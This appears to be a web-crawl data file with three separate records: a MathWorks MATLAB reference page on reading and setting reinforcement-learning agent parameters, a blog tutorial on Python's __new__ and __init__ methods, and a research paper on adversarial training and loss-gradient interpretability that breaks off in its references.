https://nl.mathworks.com/help/reinforcement-learning/ref/rl.util.rllayerrepresentation.getlearnableparametervalues.html
[ "Documentation\n\n# getLearnableParameterValues\n\nObtain learnable parameter values from policy or value function representation\n\n## Syntax\n\n``val = getLearnableParameterValues(rep)``\n\n## Description\n\nexample\n\n````val = getLearnableParameterValues(rep)` returns the values of the learnable parameters from the reinforcement learning policy or value function representation `rep`.```\n\n## Examples\n\ncollapse all\n\nAssume that you have an existing trained reinforcement learning agent. For this example, load the trained agent from Train DDPG Agent to Control Double Integrator System.\n\n`load('DoubleIntegDDPG.mat','agent') `\n\nObtain the critic representation from the agent.\n\n`critic = getCritic(agent);`\n\nObtain the learnable parameters from the critic.\n\n`params = getLearnableParameterValues(critic);`\n\nModify the parameter values. For this example, simply multiply all of the parameters by `2`.\n\n`modifiedParams = cellfun(@(x) x*2,params,'UniformOutput',false);`\n\nSet the parameter values of the critic to the new modified values.\n\n`critic = setLearnableParameterValues(critic,modifiedParams);`\n\nSet the critic in the agent to the new modified critic.\n\n`agent = setCritic(agent,critic);`\n\nAssume that you have an existing trained reinforcement learning agent. For this example, load the trained agent from Train DDPG Agent to Control Double Integrator System.\n\n`load('DoubleIntegDDPG.mat','agent') `\n\nObtain the actor representation from the agent.\n\n`actor = getActor(agent);`\n\nObtain the learnable parameters from the actor.\n\n`params = getLearnableParameterValues(actor);`\n\nModify the parameter values. For this example, simply multiply all of the parameters by `2`.\n\n`modifiedParams = cellfun(@(x) x*2,params,'UniformOutput',false);`\n\nSet the parameter values of the actor to the new modified values.\n\n`actor = setLearnableParameterValues(actor,modifiedParams);`\n\nSet the actor in the agent to the new modified actor.\n\n`agent = setActor(agent,actor);`\n\n## Input Arguments\n\ncollapse all\n\nPolicy or value function representation, specified as one of the following:\n\n• `rlLayerRepresentation` object for deep neural network representations\n\n• `rlTableRepresentation` object for value table or Q table representations\n\nTo create a policy or value function representation, use one of the following methods:\n\n## Output Arguments\n\ncollapse all\n\nLearnable parameter values for the representation object, returned as a cell array. You can modify these parameter values and set them in the original agent or a different agent using the `setLearnableParameterValues` function.", null, "" ]
[ null, "https://nl.mathworks.com/images/nextgen/callouts/bg-trial-arrow_02.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59595495,"math_prob":0.7649706,"size":3065,"snap":"2019-35-2019-39","text_gpt3_token_len":620,"char_repetition_ratio":0.19307415,"word_repetition_ratio":0.050847456,"special_character_ratio":0.17128874,"punctuation_ratio":0.11344538,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9803023,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-16T09:07:47Z\",\"WARC-Record-ID\":\"<urn:uuid:78cd3329-ad29-4bf8-9b89-8cf7e3a3c743>\",\"Content-Length\":\"79266\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:405d5c34-e0c5-4a6a-9aef-7076f273ca34>\",\"WARC-Concurrent-To\":\"<urn:uuid:e9e930d7-b958-429c-a68e-82b0bf3a8feb>\",\"WARC-IP-Address\":\"23.48.45.75\",\"WARC-Target-URI\":\"https://nl.mathworks.com/help/reinforcement-learning/ref/rl.util.rllayerrepresentation.getlearnableparametervalues.html\",\"WARC-Payload-Digest\":\"sha1:KFLIDKLRPML4DXZFOGSESZCSG53I7364\",\"WARC-Block-Digest\":\"sha1:Y5A42IXF7YDKDACQKSFXTZVY7IQF5M6N\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514572516.46_warc_CC-MAIN-20190916080044-20190916102044-00077.warc.gz\"}"}
https://radekbialowas.com/articles/python-__new__-vs-__init__/
[ "", null, "# Python __new__ vs __init__\n\nThe constructor in Python is composed of two methods `__new__` and `__init__`, executed one after the other. `__new__` creates an instance, which is then passed to `__init__`.\n\nLet’s review the properties and use cases of this somewhat exotic part of Python.\n\n## __new__ basic information\n\nFirst of all, `__new__` is a static method, therefore its first argument is a reference to the class it is called on, widely named `cls`.\n\nThe remaining arguments are due to the class call itself, so if `__init__` takes arguments, you must define the same parameters in `__new__`. Because of this, the next block of code will throw an exception:\n\n`TypeError: new() takes 1 positional argument but 2 were given`\n\n``````class Point:\ndef __new__(cls):\n...\n\ndef __init__(self, x):\nself.x = x\n\nPoint(5)``````\n\nThe value that `__new__` returns is the value returned from calling the class, which may lead to messy code, but we will take it later on.\n\n``````class Dummy:\ndef __new__(cls):\nreturn 1\n\nprint(Dummy() == 1)\n\n# Outputs:\n# True``````\n\nSo in consequence, if `__new__` does not return an instance of the class on which it is called, `__init__` will not be called.\n\n``````class Dummy:\n...\n\nclass MyClass:\ndef __new__(cls):\nreturn Dummy()\n\ndef __init__(self):\nprint('Will not be printed')\n\nprint(isinstance(MyClass(), Dummy))\n\n# Outputs:\n# True``````\n\n## Instance type based on constructor arguments\n\nThe first example smacks of anti-pattern because the returned value is of a different type than the class that is called. Let’s focus on the behavior of the methods for now.\n\nIf the sides of the rectangle are equal, then isn’t it better to return a square?\n\n``````class Square:\ndef __init__(self, side_length):\nself.side_length = side_length\n\nclass Rectangle:\ndef __new__(cls, width: float, height: float):\nif width == height:\nreturn Square(side_length=width)\n\nreturn object.__new__(Rectangle)\n\ndef __init__(self, width: float, height: float):\nself.width = width\nself.height = height\n\nr1 = Rectangle(2, 3)\nr2 = Rectangle(2, 2)\n\nprint(type(r1))\nprint(type(r2))\n\n# Outputs:\n# <class '__main__.Rectangle'>\n# <class '__main__.Square'>``````\n\n## Usage in the Singleton design pattern\n\nThe purpose of the Singleton pattern is to limit the number of instances created. There are plenty of implementations of it using mostly `__init__`.\n\nOne of the most interesting implementations of this pattern, drawing on Python’s Simple is better than complex credo, involves immediately deleting a class after creating an instance. Of course, this has its drawback, as it does not allow for lazy loading. But it is short and simple:\n\n``````class Singleton:\ndef __init__(self, *args, **kwargs):\npass\n\nsingleton_instance = Singleton()\ndel Singleton``````\n\nBack on topic, here’s an implementation of Singleton using `__new__`\n\n``````class Singleton:\n_instance = None # Keep instance reference\n\ndef __new__(cls, *args, **kwargs):\nif not cls._instance:\ncls._instance = super().__new__(cls)\nreturn cls._instance\n\ns1 = Singleton()\ns2 = Singleton()\n\nprint(s1 == s2) # → True``````\n\n## Inheritance caveats\n\nThe previous examples can be implemented in other ways without being aware of `__new__` itself. But now I will present you with situations that `__new__` is irreplaceable.\n\nSuppose that `SubClass` inherits from `BaseClass`:\n\n``````class BaseClass:\npass\n\nclass SubClass(BaseClass):\npass\n\nisinstance(SubClass(), BaseClass) # True``````\n\nNext, you want to get information about whether the call to the `BaseClass` instance comes from itself or an inheriting class.\n\n``````class BaseClass:\ndef __new__(cls):\nobj = super(BaseClass, cls).__new__(cls)\nobj._from_base_class = type(obj) == BaseClass\nreturn obj\n\nclass SubClass(BaseClass):\n...\n\nbase_instance = BaseClass()\nsub_instance = SubClass()\n\nprint(base_instance._from_base_class) # True\nprint(sub_instance._from_base_class) # False``````\n\nWhy can’t this be implemented using `__init__`? Because the `self` in `__init__`, is already an instance. In other words, when you are in, `__init__` it is too late to track the class which was used to create an instance.\n\n## inherit from immutable types\n\n`__new__` allows us to modify the returned value. If we want to modify the creation of immutable types, `__init__` is useless, because in this part of the constructor it is too late, we got already immutable instance. That’s why we need the `__new__` method.\n\nSo let’s create a `PositiveNumberTuple` class that meets the requirements:\n\n1. Inherit from tuple\n2. store only float values\n3. filters out values smaller than zero\n4. store information about how many values were skipped\n``````class PositiveNumberTuple(tuple): # 1\ndef __new__(cls, *numbers):\nskipped_values_count = 0 # 4\npositive_numbers = []\nfor x in numbers:\nif x >= 0: # 2, 3\npositive_numbers.append(x)\nelse:\nskipped_values_count += 1\n\ninstance = super().__new__(cls, tuple(positive_numbers))\n\ninstance.skipped_values_count = skipped_values_count\n\nreturn instance\n\npositive_ints_tuple = PositiveNumberTuple(-2, -1, 0, 1, 2)\n\nprint(positive_ints_tuple) # -> (0, 1, 2)\nprint(type(positive_ints_tuple)) # -> <class '__main__.PositiveNumberTuple'>\nprint(positive_ints_tuple.skipped_values_count) # -> 2\n``````\n\n## Conclusions\n\nIn summary, it is easy to abuse `__new__` usage, its applications of which cannot be replaced in any other, more common way is very narrow. However, as you have seen, it exists for a reason." ]
[ null, "https://radekbialowas.com/wp-content/uploads/2022/02/Screenshot-2022-02-14-at-18.40.32-1024x595.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.748508,"math_prob":0.87640166,"size":5142,"snap":"2022-40-2023-06","text_gpt3_token_len":1264,"char_repetition_ratio":0.14383028,"word_repetition_ratio":0.0,"special_character_ratio":0.26507196,"punctuation_ratio":0.16094421,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97664285,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T18:33:20Z\",\"WARC-Record-ID\":\"<urn:uuid:a42bfd17-0b07-4479-976e-78068eb67b8a>\",\"Content-Length\":\"129821\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ecbb4303-1b54-483e-876e-2e3054637274>\",\"WARC-Concurrent-To\":\"<urn:uuid:835d53ad-95a4-448f-b210-ec130d4841ef>\",\"WARC-IP-Address\":\"188.165.21.8\",\"WARC-Target-URI\":\"https://radekbialowas.com/articles/python-__new__-vs-__init__/\",\"WARC-Payload-Digest\":\"sha1:TLD7JGHQVVGTIMJ5AFSU2DI26TONI5AF\",\"WARC-Block-Digest\":\"sha1:5W32SASMBCYKY4XWYUAPQRVJUTGBPCPR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337663.75_warc_CC-MAIN-20221005172112-20221005202112-00000.warc.gz\"}"}
https://deepai.org/publication/bridging-adversarial-robustness-and-gradient-interpretability
[ "", null, "Adversarial training is a training scheme designed to counter adversarial attacks by augmenting the training dataset with adversarial examples. Surprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from standard DNNs. Although this phenomenon is interesting, there are only few works that have offered an explanation. In this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability. To this end, we identified that loss gradients from adversarially trained DNNs align better with human perception because adversarial training restricts gradients closer to the image manifold. We then demonstrated that adversarial training causes loss gradients to be quantitatively meaningful. Finally, we showed that under the adversarial training framework, there exists an empirical trade-off between test accuracy and loss gradient interpretability and proposed two potential approaches to resolving this trade-off.\n\n## Authors\n\n##### This week in AI\n\nGet the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.\n\n## 1 Introduction\n\nis an imperceptible perturbation to the input image which causes a deep neural network (DNN) to misclassify the perturbed input image with high confidence\n\n(Goodfellow et al., 2015). Such perturbed inputs are called adversarial examples. Numerous defence approaches have been proposed to create adversarially robust DNNs that are resistant to adversarial attacks. One of the most common and successful defence methods is adversarial training, which augments the training dataset with adversarial examples (Szegedy et al., 2013).\n\nSurprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from standard DNNs, i.e., DNN trained on natural images (Ross & Doshi-Velez, 2018; Tsipras et al., 2018; Zhang et al., 2019). These studies have used the visual interpretability of gradients as evidence that adversarial training causes DNNs to learn meaningful feature representations which align well with salient data characteristics or human perception.\n\nHowever, asking whether gradient visualization is meaningful to a human may be entirely different from determining whether it is an accurate description of the internal representation of the DNN. For instance, consider the DNN decision interpretation methods Deconvolution (Zeiler & Fergus, 2014)\n\nand Guided Backpropagation\n\n(Springenberg et al., 2015)\n\n. They visualize the importance of each input pixel in the DNN decision process with heat maps produced by calculating imputed versions of the gradient. Although they produce sharp visualizations, they have been proven to be doing partial image recovery which is unrelated to DNN decisions\n\n(Nie et al., 2018).\n\nIn light of such studies, judging the interpretability of a DNN with the visual quality of its loss gradient runs the risk of being incorrect. There have been few attempts to analyze adversarial training in the context of DNN interpretability. For example, Chalasani et al. (2018) have investigated the effect of adversarial training on network weights. However, to the best of our knowledge, there is no work which provides thorough analyses of the effect of adversarial training on the visual and quantitative interpretability of DNN loss gradients.\n\nIn this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability through a series of experiments that addresses the following questions:111All codes for the experiments in this paper are public on\nhttps://github.com/1202kbs/Robustness-and-Interpretability.\n“why do loss gradients from adversarially trained networks align better with human perception?”, “is there a relation between the strength of adversary used for training and the perceptual quality of gradients?” and most importantly, “does adversarial training really cause loss gradients to better reflect the internal representation of the DNN?”. We then ended the paper by identifying a trade-off between test accuracy and gradient interpretability and proposing two potential approaches to resolving this trade-off. Specifically, we have the following three contributions:\n\n1. Visual Interpretability. We showed that loss gradients from adversarially trained networks align better with human perception because adversarial training causes loss gradients to lie closer to the image manifold. We also provided a conjecture for this phenomenon and showed its plausibility with a toy dataset.\n\n2. Quantitative Interpretability. We showed that loss gradients from adversarially trained networks are quantitatively meaningful. To this end, we established a formal framework for quantifying how accurately gradients reflect the internal representation of the DNN. We then verified whether gradients from adversarially trained networks are quantitatively meaningful using this framework.\n\n3. Accuracy and Interpretability Trade-off. We showed with CNNs trained on CIFAR-10 that under the adversarial training framework, there exists an empirical trade-off between test accuracy and loss gradient interpretability. Then based on the experiment results, we proposed two potential approaches to resolving this trade-off.\n\n## 2 Visual Interpretability of Loss Gradients\n\nWe start by answering why adversarially trained DNNs have loss gradients that align better with human perception. All experiment settings in this paper can be found in the Appendix.\n\nTo identify why adversarial training enhances the perceptual quality of loss gradients, we hypothesized adversarial examples from adversarially trained networks lie closer to the image manifold. Note that the loss gradient is the difference between the original image and the adversarial image. Hence if the adversarial image lies closer to the image manifold, the loss gradient should align better with human perception.\n\nFollowing previous works Tsipras et al. (2018) and Stutz et al. (2018), we first trained DNNs against adversarial attacks which maximize the training loss / cross entropy (XEnt) loss or the CW surrogate objective proposed by Carlini & Wagner (2017). These objectives are maximized using Projected Gradient Descent (PGD) (Kurakin et al., 2016) such that the adversarial examples stay within or -distance of from the original image. We say an adversary, or an adversarial attack is stronger if its is larger. For consistency of observations, we trained the DNNs on three datasets: MNIST (LeCun et al., 1998), FMNIST (Xiao et al., 2017) and CIFAR-10 (Krizhevsky & Hinton, 2009). Specific adversarial training procedures are described in Appendix B.1.\n\nThen, we trained a VAE-GAN (Larsen et al., 2016) on each dataset. Using its encoder and decoder , we projected an image or an adversarial example to the approximated manifold by .222 We can also define the projection as where , but either definition led to the same results. Next, we computed to quantify how close is to the image manifold. Note that this concept of using a generative model to obtain an image’s projection to the manifold has also been applied frequently in the context of adversarial defense (Song et al., 2017; Meng & Chen, 2017; Samangoeui et al., 2018).\n\nFigure 1 compares distributions of for the test images and their adversarial examples from standard or adversarially trained DNNs. We only analyzed -bounded attacks maximizing the XEnt loss since -bounded attacks represent the original direction of the loss gradient while\n\n-bounded attacks modify the gradient through clipping. Attacks which failed to change the prediction are removed since they are likely to be zero matrices due loss function saturation.\n\nIt can be observed from Figure 1 that, for all datasets, adversarial examples for adversarially trained DNNs lie closer to the image manifold than those for standard DNNs. This suggests adversarial training restricts loss gradients to the image manifold. Hence gradients from adversarially trained DNNs are more visually interpretable. Interestingly, it can also be observed that using stronger attacks during training reduces the distance between adversarial examples and their projections even further. That is, the adversarial examples from more robust DNNs look more natural, as shown in Figure 2. We now provide a conjecture for these phenomena.\n\n### 2.2 A Conjecture Under the Boundary Tilting Perspective\n\nIn this section, we propose a conjecture for why adversarial training confines the gradient to the manifold. Our conjecture is based on the boundary tilting perspective on the phenomenon of adversarial examples (Tanay & Griffin, 2016). Figure 2(a) illustrates the boundary tilting perspective. Adversarial examples exist because the decision boundary of a standard DNN is “tilted”\n\nalong directions of low variance in the data (standard decision boundary). Under certain situations, the decision boundary will lie close to the data such that a small perturbation directed toward the boundary will cause the data to cross the boundary. Moreover, since the decision boundary is tilted, the perturbed data will leave the image manifold.\n\nUnder the boundary tilting perspective and observations of Section 2.1, we present a new conjecture on the relationship between adversarial training and visual interpretability of loss gradients: adversarial training removes tilting along directions of low variance in the data (robust decision boundary). Intuitively, this makes sense because a network is robust when only large- attacks are able to cause a nontrivial drop in accuracy, and this happens when data points of different classes are mirror images of each other with respect to the decision boundary. Since the loss gradient is generally perpendicular to the decision boundary, it will be confined to the image manifold and thus adversarial examples stay within the image manifold.\n\nAs a sanity check, we tested our conjecture with a 2-dimensional toy dataset. Specifically, we trained three two-layer ReLU network to classify points from two distinct bivariate Gaussian distributions. The first network is trained on original data and the latter two networks are trained against weak and strong adversaries. We then compared the resulting decision boundaries and the distribution of adversarial examples. Specific adversarial training procedures are described in Appendix\n\nB.2.\n\nThe training data and the results are shown in Figure 2(b). The decision boundary of the standard network is tilted along directions of low variance in the data. Naturally, the adversarial examples leave the data manifold. On the other hand, adversarial training removes the tilt. Hence adversarial perturbations move data points to the manifold of the other class. We also observed training against a stronger adversary removes the tilt to a larger degree. This causes adversarial examples to align better with the data manifold. Hence the decision boundary tilting perspective may also account for why adversarial training with stronger attack reduces the distance between an adversarial example and its projection even further (Figure 1). We leave more theoretical justification and deeper experimental validation of our observations and hypothesis for future work.\n\nIf our conjecture is true, adversarial training prevents the decision boundary from tilting. Hence adversarial examples are restricted to the image manifold and thus loss gradients align better with human perception. However, as we have discussed in Section 1, visual sharpness of gradients do not imply that they accurately represent the features learned by the DNN. We address this issue in the next section by quantitatively evaluating the interpretability of loss gradients.\n\n## 3 Interpretability of Adversarially Trained Networks\n\nTo the best of our knowledge, there are no works on quantifying the interpretability of loss gradients. However, quantitative interpretability of logit gradients and its variants have been thoroughly studied in the context of attribution methods\n\n(Bach et al., 2015; Samek et al., 2017; Adebayo et al., 2018; Hooker et al., 2018).333Attribution methods are DNN decision interpretation methods which assign a signed attribution value to each input feature (pixel). An attribution value quantifies the amount of influence of the corresponding feature on the final decision. Since each pixel is assigned an attribution value, we can visualize the attributions by arranging them to have the same shape as the input. Since the loss gradient highlights the input features which affect the loss most strongly, and thus are important for the DNN’s prediction, we may also treat it as an attribution method. This allows us to extend the reasoning and techniques in works on attribution method evaluation to the loss gradient.444Since the loss gradient is a linear combination of logit gradients, we can reasonably expect most observations for loss gradients to hold for logit gradients as well (and vice versa). However, loss gradients have the nice property of being generally perpendicular to the decision boundary, and this gives us more insights such as Section 2.2. Hence we have chosen to examine loss gradients, not logit gradients.\n\n### 3.1 Formal Description of the Quantitative Evaluation Framework\n\nWe denote vectors or vector-valued functions by boldface letters. Let\n\nand\n\ndenote families of DNNs, attribution methods and attribution method evaluation metrics. A DNN\n\nmaps an image to a vector of class logits , where is the input dimension and is the number of classes. Then an attribution method maps the tuple to a vector of attribution scores . Finally, an attribution method evaluation metric assigns to each tuple a scalar indicating how accurately reflects the internal representation of . A higher value of indicates that the attribution method better describes the internal representation of the DNN.\n\nHere, note that the value of depends on both and . Previous works have focused on improving the value of for fixed by developing better and more complex (Bach et al., 2015; Sundararajan et al., 2017; Smilkov et al., 2017; Shrikumar et al., 2017). However, we can also improve the value of for fixed by varying through changing the network topology, training scheme, etc. It is only recently that the latter approach have started to receive attention. In the next section, we investigate this approach in the context of adversarial training.\n\nHere we experimentally evaluate whether loss gradients from adversarially trained DNNs are truly more interpretable than those from standard DNNs. Using the definitions from the previous section, we can rephrase this goal as follows: Let be the family of standard DNNs and let be the family of adversarially trained DNNs, all of the same architecture. Given an attribution method , we want to verify whether . In particular, we are interested in the case when where is the XEnt loss. We denote this attribution method by . We also evaluate a variant Gradient Input (Shrikumar et al., 2017): . We denote Gradient Input using the XEnt loss by .", null, "Figure 4: Effect of adversarial training on interpretability of gG and gGX. The x-axis indicates ϵ (attack strength) used during training. The values of ϵ are scaled into [0,1] such that ℓ2-bounded attacks and ℓ∞-bounded attacks are comparable. Note that ϵ=0 is standard training. The y-axis indicates quantitative interpretability, as explained in the text. We also show the linear correlation coefficient and Spearman’s rank correlation coefficient for each combination of adversarial training setting (norm and objective) and attribution method (G for gG and GX for gGX).\n\nWe quantified the interpretability of each methods via two attribution method evaluation metrics Remove and Retrain (ROAR) and Keep and Retrain (KAR) (Hooker et al., 2018)\n\n. Specifically, we measured how the performance of the classifier changed as features were occluded based on the ordering assigned by the attribution method. For ROAR, we replaced a fraction of all CIFAR-10 pixels estimated to be\n\nmost important with a constant value. For KAR, we replaced the pixels estimated to be least important. We then retrained a CNN on the modified dataset and measured the change in test accuracy. We trained three CNNs per attribution method for each fraction and measured test accuracy as the average of these three CNNs.\n\nSince ROAR removes most important input features, a better attribution method should cause more accuracy degradation. Conversely, since KAR removes least important features, a better attribution method should cause less accuracy degradation. For reference, we also evaluated the random baseline which assigns random attribution values to input features. We then defined the interpretability scores under ROAR and KAR by\n\n μROAR(f,g) =(Area over curve (AOC) of the ROAR curve for g)−(AOC for gRand), μKAR(f,g) =(Area under curve (AUC) of the KAR curve for g)−(AUC for gRand).\n\nFigure 4 shows the values of and for each adversarial training setting. Specific adversarial training procedures are described in Appendix B.3. First, we observed that there is a strong positive correlation between the strength of attack used during adversarial training and interpretability with the exception of from -trained DNNs in KAR. This result is significant because it shows adversarial training indeed causes the gradient to better reflect the internal representation of the DNN. It implies that training with an appropriate “interpretability regularizer” may be enough to produce DNNs that can be interpreted with simple attribution methods such as gradient or Gradient Input. However, it does not imply we no longer need to develop complex attribution methods to interpret DNNs. This topic will be dealt with further in Section 3.3, in the context of trade-off between accuracy and loss gradient interpretability.\n\nWe also observed Gradient Input performs better than the loss gradient. We believe this is because the former method is a global attribution method while the latter is a local attribution method.555Local attribution methods return vectors that maximize the value which the attribution is taken with respect to. On the other hand, global attribution methods visualize the marginal effect of each feature on that value. For further details on the difference between local and global attribution methods, we refer the readers to Section 3.2 of Ancona et al. (2018). Since both ROAR and KAR evaluate attribution methods based on feature occlusion, Gradient Input should theoretically show better performance.\n\nFinally, we remark that if our conjecture in Section 2.2 is true, there may be a close connection between gradient interpretability and the degree to which gradient is confined to the data manifold. In other words, DNNs with less tilted decision boundaries may yield loss gradients that are more visually and quantitatively meaningful.\n\nPrevious works have observed that there may be a trade-off between accuracy and adversarial robustness (Tsipras et al., 2018; Su et al., 2018). As we have shown in the previous section, there exists a positive correlation between the strength of adversarial attack used in the training process and gradient interpretability. Hence it is highly likely that there exists a negative correlation between network accuracy and gradient interpretability. To verify this, we trained CNNs on CIFAR-10 under various adversarial attack settings and evaluated their gradient interpretability. More detailed experiments setting used in this subsection can be found in Appendix B.3.", null, "Figure 5: Relation between test accuracy and interpretability of gG and gGX under the adversarial training framework. The x-axis indicates test accuracy on natural images. The y-axis indicates quantitative interpretability, as explained in the text. We also show the linear correlation coefficient and Spearman’s rank correlation coefficient for each combination of adversarial training setting (norm and objective) and attribution method (G for gG and GX for gGX).", null, "(a) MNIST\n\nFigure 5 shows the relation between test accuracy and loss gradient interpretability. Indeed, there is a near-monotonic decreasing relation between interpretability and accuracy under both ROAR and KAR. We note that the only exception of this trend is from -trained DNNs in KAR. These results imply that adversarial training itself is not a perfect method for attaining gradient interpretability without sacrificing test accuracy.\n\nWe also observed that attributions from -trained networks are more resistant to this trade-off in ROAR. On the other hand, attributions from -trained networks were more resistant in KAR. This implies attributions from -trained DNNs are more effective at emphasizing important features while attributions from -trained DNNs are better at identifying less important features. This is somewhat consistent with the visual characteristics of loss gradients: as shown in Figure 6, gradients from -trained networks are very sparse but discontinuous while gradients from -trained networks are smooth but less sparse. Analyzing the effect of norm used to constrain the adversary on the neural network’s decision boundary and the gradient may also be an interesting line of research.\n\nFrom the results, we see two potential approaches to resolving this trade-off. First, since the global attribution method performs better than the local attribution method , we can explore combinations of adversarial training with other global attribution methods such as Layer-wise Relevance Propagation (Bach et al., 2015), DeepLIFT (Shrikumar et al., 2017) or Integrated Gradient (Sundararajan et al., 2017). Second, since there is large performance gain in using -training over -training in KAR while there is only slight gain in using -training over -training in ROAR, we can seek better ways of applying -training.\n\n## 4 Conclusion\n\nAdversarial training is a training scheme designed to counter adversarial attacks by augmenting the training dataset with adversarial examples. Surprisingly, several studies have observed that loss gradients from adversarially trained DNNs are visually more interpretable than those from DNNs trained on natural images. Although this phenomenon is interesting, there are only few works that have offered an explanation. In this paper, we attempted to bridge this gap between adversarial robustness and gradient interpretability. To this end, we identified that loss gradients from adversarially trained DNNs align better with human perception because adversarial training restricts loss gradients closer to the image manifold. We also provided a conjecture for this phenomenon and verified its plausibility with a toy dataset. We then demonstrated that adversarial training indeed causes gradients to be quantitatively meaningful with two attribution method evaluation metrics. Finally, we showed with CNNs trained on CIFAR-10 that under the adversarial training framework, there exists an empirical trade-off between test accuracy and gradient interpretability. Then based on the experiment results, we proposed two potential approaches to resolving this trade-off.\n\n## References\n\n• Adebayo et al. (2018) Julius Adebayo, Justin Gilmer, Michael Muelly, Ian Goodfellow, Moritz Hardt, and Been Kim. Sanity checks for saliency maps. In Neural Information Processing Systems, 2018.\n• Ancona et al. (2018) Marco Ancona, Enea Ceolini, Cengiz Öztireli, and Markus Gross. Towards better understanding of gradient-based attribution methods for deep neural networks. In International Conference on Learning Representations, 2018.\n• Bach et al. (2015) Sebastian Bach, Alexander Binder, Grégoire Montavon, Frederick Klauschen, Klaus Robert Müller, and Wojciech Samek. On pixel-wise explanations for non-linear classifier decisions by layer-wise relevance propagation. PLoS ONE, 10(7):1–46, 2015. ISSN 19326203.\n• Carlini & Wagner (2017) Nicholas Carlini and David Wagner. Towards evaluating the robustness of neural networks. In IEEE Symposium on Security and Privacy, 2017.\n• Chalasani et al. (2018) Prasad Chalasani, Somesh Jha, Aravind Sadagopan, and Xi Wu. Adversarial learning and explainability in structured datasets. arXiv preprint arXiv:1810.06583, 2018.\n• Goodfellow et al. (2015) Ian J. Goodfellow, Jonathan Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. In International Conference on Learning Representations, 2015.\n• Hooker et al. (2018) Sara Hooker, Dumitru Erhan, Pieter-Jan Kindermans, and Been Kim. Evaluating feature importance estimates. In\n\nICML Workshop on Human Interpretability in Machine Learning\n\n, 2018.\n• Krizhevsky & Hinton (2009) Alex Krizhevsky and Geoffrey Hinton. Learning multiple layers of features from tiny images. 2009.\n• Kurakin et al. (2016) Alexey Kurakin, Ian Goodfellow, and Samy Bengio. Adversarial examples in the physical world. In ICLR Workshop, 2016.\n• Larsen et al. (2016) A. B. Lindbo Larsen, S. Kaae Sønderby, Hugo Larochelle, and Ole Winther. Autoencoding beyond pixels using a learned similarity metric. International Conference on Machine Learning, 2016.\n• LeCun et al. (1998) Yann LeCun, Corinna Cortes, and Christopher JC Burges.\n\nThe mnist database of handwritten digits.\n\n1998.\n• Meng & Chen (2017) Dongyu Meng and Hao Chen. Magnet: a two-pronged defense against adversarial examples. In ACM Conference on Computer and Communications Security (CCS), 2017.\n• Miyato et al. (2018) Takeru Miyato, Toshiki Kataoka, Masanori Koyama, and Yuichi Yoshida. Spectral normalization for generative adversarial networks. In International Conference on Learning Representations, 2018.\n• Nie et al. (2018) Weili Nie, Yang Zhang, and Ankit Patel. A theoretical explanation for perplexing behaviors of backpropagation-based visualizations. In International Conference on Machine Learning, 2018.\n• Ross & Doshi-Velez (2018) Andrew S. Ross and Finale Doshi-Velez. Improving the adversarial robustness and interpretability of deep neural networks by regularizing their input gradients. In\n\nAAAI Conference on Artificial Intelligence\n\n, 2018.\n• Samangoeui et al. (2018) Pouya Samangoeui, Maya Kabkab, and Rama Chellappa. Defense-gan: Protecting classifiers against adversarial attacks using generative models. In International Conference on Learning Representations, 2018.\n• Samek et al. (2017) Wojciech Samek, Alexander Binder, Grégoire Montavon, Sebastian Lapuschkin, and Klaus-Robert Müller. Evaluating the visualization of what a deep neural network has learned. IEEE transactions on neural networks and learning systems, 28(11):2660–2673, 2017.\n• Shrikumar et al. (2017) Avanti Shrikumar, Peyton Greenside, and Anshul Kundaje. Learning important features through propagating activation differences. In International Conference on Machine Learning, 2017.\n• Smilkov et al. (2017) Daniel Smilkov, Nikhil Thorat, Been Kim, Fernanda Viégas, and Martin Wattenberg. Smoothgrad: removing noise by adding noise. In\n\nICML Workshop on Visualization for Deep Learning\n\n, 2017.\n• Song et al. (2017) Yang Song, Taesup Kim, Sebastian Nowozin, Stefano Ermon, and Nate Kushman. Pixeldefend: Leveraging generative models to understand and defend against adversarial examples. In International Conference on Learning Representations, 2017.\n• Springenberg et al. (2015) Jost Tobias Springenberg, Alexey Dosovitskiy, Thomas Brox, and Martin Riedmiller. Striving for simplicity: The all convolutional net. International Conference on Learning Representations Workshop, 2015.\n• Stutz et al. (2018) David Stutz, Matthias Hein, and Bernt Schiele. Disentangling adversarial robustness and generalization. arXiv preprint arXiv:1812.00740, 2018.\n• Su et al. (2018) Dong Su, Huan Zhang, Hongge Chen, Jinfeng Yi, Pin-Yu Chen, and Yupeng Gao. Is robustness the cost of accuracy? – a comprehensive study of robustness of 18 deep image classification models. In ECCV, 2018.\n• Sundararajan et al. (2017) Mukund Sundararajan, Ankur Taly, and Qiqi Yan. Axiomatic attribution for deep networks. In International Conference on Machine Learning, 2017.\n• Szegedy et al. (2013) Christian Szegedy, Wojciech Zaremba, Ilya Sutskever, Joan Bruna, Dumitru Erhan, Ian J. Goodfellow, and Rob Fergus. Intriguing properties of neural networks. arXiv preprint arXiv:1312.6199, 2013.\n• Tanay & Griffin (2016) Thomas Tanay and Lewis Griffin. A boundary tilting perspective on the phenomenon of adversarial examples. arXiv preprint arXiv:1608.07690, 2016.\n• Tsipras et al. (2018) Dimitris Tsipras, Shibani Santurkar, Logan Engstrom, Alexander Turner, and Aleksander Mądry.\n\nRobustness may be at odds with accuracy.\n\nIn International Conference on Learning Representations, 2018.\n• Xiao et 